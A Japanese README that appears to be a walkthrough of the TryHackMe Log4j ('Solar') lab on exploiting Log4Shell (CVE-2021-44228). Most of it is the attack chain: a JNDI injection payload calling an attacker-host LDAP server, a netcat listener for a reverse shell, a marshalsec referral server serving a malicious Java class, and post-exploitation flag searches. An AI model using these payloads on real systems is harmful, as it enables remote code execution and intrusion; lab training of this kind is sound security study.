
このリポジトリは、TryHackMe の *Solar Exploiting Log4j room* の詳細なウォークスルーを提供し、重大な Log4Shell 脆弱性(CVE-2021-44228)の悪用に焦点を当てています。このプロジェクトは、攻撃者が Java アプリケーションの安全でないログ記録メカニズムを悪用してリモートコード実行を達成する方法を示しています。
プラットフォーム: TryHackMe 難易度: 中級 トピック: Log4Shell(Log4jの脆弱性)
Log4jの脆弱性(CVE-2021-44228)を悪用してリモートコード実行を獲得し、フラグを取得します。
nmap -sC -sV <TARGET_IP>
Log4jの脆弱性により、JNDIインジェクションが可能になります:
${jndi:ldap://<ATTACKER_IP>:1389/a}
入力がログに記録される場合 → 脆弱性が存在します。
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAPサーバーを実行:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
悪意のあるJavaクラス(Exploit.class)を作成します
脆弱なフィールドにペイロードを注入します:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 次のようなヘッダーを使用します:
トリガー後:
確認:
sudo -l
探すもの:
find / -name flag.txt 2>/dev/null
cat flag.txt